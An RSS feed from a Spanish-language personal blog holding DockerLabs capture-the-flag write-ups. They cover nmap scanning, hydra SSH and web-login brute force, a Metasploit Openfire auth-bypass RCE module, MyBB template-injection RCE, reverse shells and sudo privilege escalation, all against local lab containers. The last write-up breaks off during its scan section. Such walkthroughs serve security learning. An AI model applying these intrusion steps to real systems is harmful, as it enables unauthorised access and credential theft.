<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
  <channel>
    <title>Romabri</title>
    <description>Este sera un blog para ir dejando lo que aprenda</description>
    <link>https://romabri.github.io</link>
    <atom:link href="https://romabri.github.io/feed.xml" rel="self" type="application/rss+xml" />
    <author>
      <name>Romabri</name>
      <email></email>
      <uri>https://romabri.github.io</uri>
    </author>
    
      <item>
        <title>ChocolateFire - DockerLabs</title>
        <description>&lt;table&gt;
  &lt;thead&gt;
    &lt;tr&gt;
      &lt;th&gt;OS&lt;/th&gt;
      &lt;th&gt;Dificultad&lt;/th&gt;
      &lt;th&gt;Creator&lt;/th&gt;
    &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
    &lt;tr&gt;
      &lt;td&gt;Linux&lt;/td&gt;
      &lt;td&gt;Medio&lt;/td&gt;
      &lt;td&gt;ElPinguinoDeMario&lt;/td&gt;
    &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;

&lt;h2 id=&quot;escaneo-y-reconocimiento-de-puertos&quot;&gt;Escaneo y Reconocimiento de puertos&lt;/h2&gt;

&lt;p&gt;Vamos a iniciar nuestro reconocimiento con un rápido escaneo de nmap.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/b34f0c31-9d39-45c2-8bbc-301884d5447b&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;nmap -p- --open -sS -sC -sV --min-rate=5000 -vvv -n -Pn -oN escaneo 172.17.0.2&lt;/code&gt;&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-p-&lt;/code&gt;: Escanea todos los puertos (1-65535).&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;--open&lt;/code&gt;: Solo muestra los puertos abiertos.&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-sS&lt;/code&gt;: Realiza un escaneo SYN, que es rápido y discreto.&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-sC&lt;/code&gt;: Utiliza los scripts de reconocimiento por defecto de Nmap.&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-sV&lt;/code&gt;: Detecta la versión del servicio en los puertos abiertos.&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;--min-rate=5000&lt;/code&gt;: Envía al menos 5000 paquetes por segundo, acelerando el escaneo.&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-n&lt;/code&gt;: No realiza resolución DNS.&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-Pn&lt;/code&gt;: No realiza ping previo para determinar si el host está activo.&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-vvv&lt;/code&gt;: Muestra resultados detallados y en tiempo real.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Vemos que estan abiertos varios puertos, vamos a investigar cada una hasta encontrar algo interesante.&lt;/p&gt;

&lt;h2 id=&quot;web&quot;&gt;Web&lt;/h2&gt;
&lt;p&gt;Si accedemos al servicio web que corre por el pueto 9090 vemos lo siguiente&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/5ad6d755-64f3-413d-b2c1-94f9f9f1be52&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Si probamos usaurio y contraseña admin:admin accedemos sin problemas.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/21651930-8dd9-4cc8-befa-c1bdd1c37b8f&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Al ver la versión vamos a buscar vías potenciales para acceder a la maquina.&lt;/p&gt;

&lt;p&gt;Si vamos a la ventana plugins vemos que podemos subir archivos .jar&lt;/p&gt;

&lt;p&gt;Si vamos a la siguiente web https://www.rapid7.com/db/modules/exploit/multi/http/openfire_auth_bypass_rce_cve_2023_32315/ nos muestra como podemos hacer la intrusión con metasploit y como normalemente no hacemos write ups con esta herramienta la voy a usar así que abrimos metasploit.&lt;/p&gt;

&lt;h2 id=&quot;intrusión&quot;&gt;Intrusión&lt;/h2&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/1fbdafd1-58f0-4b5d-a7a1-b3d648b23202&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;usamos el siguiente modulo de metasploit&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;use exploit/multi/http/openfire_auth_bypass_rce_cve_2023_32315
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;Ahora hacemos un show options y vamos rellenando los campos que necesitemos para hacer la intrusión&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/0b809be2-98f5-4209-b502-99af2cff7956&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;En este caso el RHOSTS y el LHOST y usamos el comando run para empezar a lanzar el exploit&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/777d7ccf-88d4-4902-80db-fb1ed9c4fefa&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Ya hemos hecho la intrusión y somos el usuario root.&lt;/p&gt;
</description>
        <pubDate>Wed, 26 Jun 2024 00:00:00 +0000</pubDate>
        <link>https://romabri.github.io//ChocolateFire</link>
        <link href="https://romabri.github.io/ChocolateFire"/>
        <guid isPermaLink="true">https://romabri.github.io/ChocolateFire</guid>
      </item>
    
      <item>
        <title>Obsession - DockerLabs</title>
        <description>&lt;table&gt;
  &lt;thead&gt;
    &lt;tr&gt;
      &lt;th&gt;OS&lt;/th&gt;
      &lt;th&gt;Dificultad&lt;/th&gt;
      &lt;th&gt;Creator&lt;/th&gt;
    &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
    &lt;tr&gt;
      &lt;td&gt;Linux&lt;/td&gt;
      &lt;td&gt;Muy Fácil&lt;/td&gt;
      &lt;td&gt;Juan Carlos&lt;/td&gt;
    &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;

&lt;h2 id=&quot;escaneo-y-reconocimiento-de-puertos&quot;&gt;Escaneo y Reconocimiento de puertos&lt;/h2&gt;

&lt;p&gt;Vamos a iniciar nuestro reconocimiento con un rápido escaneo de nmap.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/90d27320-f151-42e1-834e-6ad76bfee791&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;nmap -p- --open -sS -sC -sV --min-rate=5000 -vvv -n -Pn -oN escaneo 172.17.0.2&lt;/code&gt;&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-p-&lt;/code&gt;: Escanea todos los puertos (1-65535).&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;--open&lt;/code&gt;: Solo muestra los puertos abiertos.&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-sS&lt;/code&gt;: Realiza un escaneo SYN, que es rápido y discreto.&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-sC&lt;/code&gt;: Utiliza los scripts de reconocimiento por defecto de Nmap.&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-sV&lt;/code&gt;: Detecta la versión del servicio en los puertos abiertos.&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;--min-rate=5000&lt;/code&gt;: Envía al menos 5000 paquetes por segundo, acelerando el escaneo.&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-n&lt;/code&gt;: No realiza resolución DNS.&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-Pn&lt;/code&gt;: No realiza ping previo para determinar si el host está activo.&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-vvv&lt;/code&gt;: Muestra resultados detallados y en tiempo real.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Vemos que esta abierto el puerto 21 &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;FTP&lt;/code&gt; , 22 &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;SSH&lt;/code&gt; y el puerto 80 &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;HTTP&lt;/code&gt;&lt;/p&gt;

&lt;h2 id=&quot;ftp&quot;&gt;FTP&lt;/h2&gt;

&lt;p&gt;Vamos a conectarnos via ftp con el siguiente comando&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;ftp 172.17.0.2
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;En usuario ponemos anonymous ya que en el reporte de nmap nos pone que tenemos disponible la conexion anonima y en contraseña no ponemos nada.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/61959215-eb88-4756-a16e-9de4628cd3e6&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Tenemos dos archivos, vamos a descargarlos con el comando GET&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/0aa4fac5-b53a-418f-8e2c-442839b43c82&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Estos son los dos archivos que tenemos txt&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/85ffe338-aa32-408e-aa62-24a5ee6f7c5a&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;De aqui tenemos poca información como mucho 3 posibles usuarios Gonza, Russoski y Nagore pero como no podemos hacer enumeración de usuarios ya que el SSH esta actualizado vamos a ver la pagina web.&lt;/p&gt;

&lt;h2 id=&quot;enumeración-web&quot;&gt;Enumeración Web&lt;/h2&gt;
&lt;p&gt;Si accedemos a la pagina web vemos lo siguiente&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/ff446025-0906-4278-9b90-4026fd31d3c4&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Usamos &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;Gobuster&lt;/code&gt; para hacer un reconocimiento web y ver que directorios podemos encontrar en dicho sitio.&lt;/p&gt;

&lt;p&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;gobuster dir -u http://172.17.0.2/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php&lt;/code&gt;&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;gobuster dir&lt;/code&gt; - Indica que estás utilizando la herramienta Gobuster para realizar un escaneo de directorios.&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-u http://172.20.10.5/&lt;/code&gt; Especifica la URL objetivo que deseas escanear en busca de directorios.&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-w&lt;/code&gt; Especifica que diccionario queremos usar&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-x&lt;/code&gt; Para indicar que tipo de extension queremos que nos encuentre&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Gobuster no ha encontrado nada&lt;/p&gt;

&lt;p&gt;Pero en una de las entradas vemos algo interesante&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/a74c4f13-81bc-463e-b153-59ebfea81cbe&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Vamos al directorio backup y nos encontramos con otro txt que dice lo siguente:&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/63be6dcd-1798-4243-870f-f0b84859f844&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Y tambien vamos al important y encontramos un important.md.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/f23be760-e42e-408d-9207-aab93ddc4ef4&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Tenemos un usuario vamos hacer fuerza bruta&lt;/p&gt;

&lt;h2 id=&quot;ataque-de-fuerza-bruta-con-hydra&quot;&gt;Ataque de fuerza bruta con Hydra&lt;/h2&gt;

&lt;p&gt;Como tenemos un possible usuario, vamos hacer un ataque de fuerza bruta con Hydra al protocolo ssh de la siguiente forma:&lt;/p&gt;

&lt;p&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;hydra -l russoski -P /usr/share/wordlists/rockyou.txt ssh://172.17.0.2&lt;/code&gt;&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-l&lt;/code&gt; - Para especificar el usaurio&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-P&lt;/code&gt; - Para especificar que diccionario de fuerza bruta usaremos&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;ssh://172.17.0.2&lt;/code&gt; - Especificamos que queremos atentar contra el protocolo SSH de la IP victima&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/fa75864b-7244-435b-8253-9b06f2589642&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Como vemos, existe el usuario &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;russoski&lt;/code&gt; y la contraseña es &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;iloveme&lt;/code&gt;.&lt;/p&gt;

&lt;h2 id=&quot;intrusión&quot;&gt;Intrusión&lt;/h2&gt;

&lt;p&gt;Ahora accedemos vía SSH&lt;/p&gt;

&lt;p&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;ssh russoski@172.17.0.2&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;Si hacemos un sudo -l encontramos que podemos ejecutar el vim como ROOT entonces vamos a buscar en GTFOBINS como hacerlo&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/0a239044-bfe5-4897-9daf-b55e72d16508&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Para escalar privilegios hacemos lo siguiente:&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/da3eb433-c886-4bf0-8aff-7ca88891f3dc&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Ya somos ROOT&lt;/p&gt;
</description>
        <pubDate>Tue, 25 Jun 2024 00:00:00 +0000</pubDate>
        <link>https://romabri.github.io//Obsession</link>
        <link href="https://romabri.github.io/Obsession"/>
        <guid isPermaLink="true">https://romabri.github.io/Obsession</guid>
      </item>
    
      <item>
        <title>MyBB - DockerLabs</title>
        <description>&lt;table&gt;
  &lt;thead&gt;
    &lt;tr&gt;
      &lt;th&gt;OS&lt;/th&gt;
      &lt;th&gt;Dificultad&lt;/th&gt;
      &lt;th&gt;Creator&lt;/th&gt;
    &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
    &lt;tr&gt;
      &lt;td&gt;Linux&lt;/td&gt;
      &lt;td&gt;Medio&lt;/td&gt;
      &lt;td&gt;Pylon&lt;/td&gt;
    &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;

&lt;h2 id=&quot;escaneo-y-reconocimiento-de-puertos&quot;&gt;Escaneo y Reconocimiento de puertos&lt;/h2&gt;

&lt;p&gt;Vamos a iniciar nuestro reconocimiento con un rápido escaneo de nmap.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/ed4e3102-ae16-4ad2-99ea-a9f154a71795&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;nmap -p- --open -sS -sC -sV --min-rate=5000 -vvv -n -Pn -oN escaneo 172.17.0.2&lt;/code&gt;&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-p-&lt;/code&gt;: Escanea todos los puertos (1-65535).&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;--open&lt;/code&gt;: Solo muestra los puertos abiertos.&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-sS&lt;/code&gt;: Realiza un escaneo SYN, que es rápido y discreto.&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-sC&lt;/code&gt;: Utiliza los scripts de reconocimiento por defecto de Nmap.&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-sV&lt;/code&gt;: Detecta la versión del servicio en los puertos abiertos.&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;--min-rate=5000&lt;/code&gt;: Envía al menos 5000 paquetes por segundo, acelerando el escaneo.&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-n&lt;/code&gt;: No realiza resolución DNS.&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-Pn&lt;/code&gt;: No realiza ping previo para determinar si el host está activo.&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-vvv&lt;/code&gt;: Muestra resultados detallados y en tiempo real.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Vemos que esta abierto el puerto 80 &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;HTTP&lt;/code&gt;&lt;/p&gt;

&lt;h2 id=&quot;enumeración-web&quot;&gt;Enumeración Web&lt;/h2&gt;
&lt;p&gt;Si accedemos a la pagina web vemos lo siguiente 
&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/4d9682d4-9fc3-4079-9cda-e12380aeba86&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Usamos &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;Gobuster&lt;/code&gt; para hacer un reconocimiento web y ver que directorios podemos encontrar en dicho sitio.&lt;/p&gt;

&lt;p&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;gobuster dir -u http://172.17.0.2/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php&lt;/code&gt;&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;gobuster dir&lt;/code&gt; - Indica que estás utilizando la herramienta Gobuster para realizar un escaneo de directorios.&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-u http://172.20.10.5/&lt;/code&gt; Especifica la URL objetivo que deseas escanear en busca de directorios.&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-w&lt;/code&gt; Especifica que diccionario queremos usar&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-x&lt;/code&gt; Para indicar que tipo de extension queremos que nos encuentre&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/e98cfae8-8d71-4eec-82e9-723e02e70be7&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Encuentra diferentes directorios, si accedemos al index.html encontramos lo siguente:&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/9a2c6fb4-49f3-4887-b857-259002c0e739&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Si accedemos al foro vemos que tenemos que poner en el archivo hosts el dominio panel.mybb.dl&lt;/p&gt;

&lt;p&gt;Y ahora vemos lo siguiente&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/70bc909b-335d-47a1-8ce1-3efd4820f199&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Vemos un usuario, el usuario admin&lt;/p&gt;

&lt;p&gt;Vamos a volver a pasar el gobuster y nos encuentra bastantes directorios.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/ebaf814d-979f-44f3-b2aa-1a6169abc543&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Vemos el directorio admin si accedemos nos encontramos con un panel de login, probamos las contraseñas típicas pero no podemos acceder.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/5642db6e-bd56-4532-bc3f-2a918b7c3912&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Vamos a interceptar la petición con burpsuite y hacer un ataque de fuerza bruta con hydra para ver si conseguimos la contraseña.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/b5c5a06b-619d-47b4-92c3-4acf7950b512&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/ad1e3853-db23-4508-9463-75b179ccd657&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Nos aparecen diferentes contraseñas vamos a probarlas.&lt;/p&gt;

&lt;p&gt;Perfecto la contraseña es babygirl así que vamos a seguir con la intrusión&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/b8dc004b-3d93-44da-ad42-3da9113e24c0&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Nos aparece que la versión de mybb es la &lt;em&gt;MyBB 1.8.35&lt;/em&gt; vamos a buscar por internet información sobre vulnerabilidades.&lt;/p&gt;

&lt;p&gt;Encontramos que es vulnerable a Template Code Injection y encontramos una prueba de como hacer que esto funcione https://blog.sorcery.ie/posts/mybb_acp_rce/&lt;/p&gt;

&lt;p&gt;Lo que tenemos que hacer es ir a Templates &amp;amp; Style &amp;gt; Templates &amp;gt; Default Templates &amp;gt; Who’s Online Templates &amp;gt; Online&lt;/p&gt;

&lt;p&gt;Ahí tendremos que pegar un codigo que se nos proporciona en la web antes mencionada&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/b893117a-a092-49e9-9b6d-aeb5a8db5987&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Luego le damos a guardar y si lo tenemos bien hecho tendremos estas dos opciones disponibles&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/5363d2f6-1710-4cb6-ae48-948ed9e63d46&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Si accedemos al PHPInfo vemos que funciona&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/eb148c36-6a5d-4746-b12c-3499d90991b3&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Así que vamos a ver si la ejecución de comandos también nos funciona.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/6813d360-41d1-45dc-b31c-3465f816a52a&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Como si que funcióna podemos hacer una reverse shell para poder acceder a la máquina.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/e1b9aae7-9609-45da-8a81-be50d71243b9&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;h2 id=&quot;escalada-de-privilegios&quot;&gt;Escalada de privilegios&lt;/h2&gt;

&lt;p&gt;Si investigamos los archivos vemos que hay un a archivo en /var/www/mybb/backups, llamado data y dentro de ese mismo hay una contraseña encriptada de la usuaria alice&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/33b9493d-13a8-435d-bb22-e0d67e2381d2&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Si le pasamos la contraseña encriptada a john nos da la contraseña en texto claro de alice&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/267cc096-148e-40cf-a033-f022281c81c1&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Ahora si hacemos un sudo -l vemos que alice tiene permisos para ejecutar cualquier script en ruby&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/e48112e6-f1c2-4692-a7f0-d01e66250fef&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Vamos a buscar algun script en ruby que haga una reverse shell para poder conectarnos como root&lt;/p&gt;

&lt;p&gt;https://gist.github.com/gr33n7007h/c8cba38c5a4a59905f62233b36882325&lt;/p&gt;

&lt;p&gt;Copiamos este script en nuestra maquina local, lo pasamos con un servidor de python a la maquina victima y lo ejecutamos.&lt;/p&gt;

&lt;p&gt;En nuestra maquina atacante tendremos que ponernos por escucha con nc por el puerto que le pongamos en el script.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/226331d6-7f9a-4728-a8a7-0c2cd1bee8fb&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Ya somos root.&lt;/p&gt;

</description>
        <pubDate>Tue, 25 Jun 2024 00:00:00 +0000</pubDate>
        <link>https://romabri.github.io//MyBB</link>
        <link href="https://romabri.github.io/MyBB"/>
        <guid isPermaLink="true">https://romabri.github.io/MyBB</guid>
      </item>
    
      <item>
        <title>HereBash - DockerLabs</title>
        <description>&lt;table&gt;
  &lt;thead&gt;
    &lt;tr&gt;
      &lt;th&gt;OS&lt;/th&gt;
      &lt;th&gt;Dificultad&lt;/th&gt;
      &lt;th&gt;Creator&lt;/th&gt;
    &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
    &lt;tr&gt;
      &lt;td&gt;Linux&lt;/td&gt;
      &lt;td&gt;Fácil&lt;/td&gt;
      &lt;td&gt;Firstattack&lt;/td&gt;
    &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;

&lt;h2 id=&quot;escaneo-y-reconocimiento-de-puertos&quot;&gt;Escaneo y Reconocimiento de puertos&lt;/h2&gt;

&lt;p&gt;Vamos a iniciar nuestro reconocimiento con un rápido escaneo de nmap.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/365f8d4e-f68f-4007-b101-05902bd02c93&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;nmap -p- --open -sS -sC -sV --min-rate=5000 -vvv -n -Pn -oN escaneo 172.17.0.2&lt;/code&gt;&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-p-&lt;/code&gt;: Escanea todos los puertos (1-65535).&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;--open&lt;/code&gt;: Solo muestra los puertos abiertos.&lt;/li&gt;
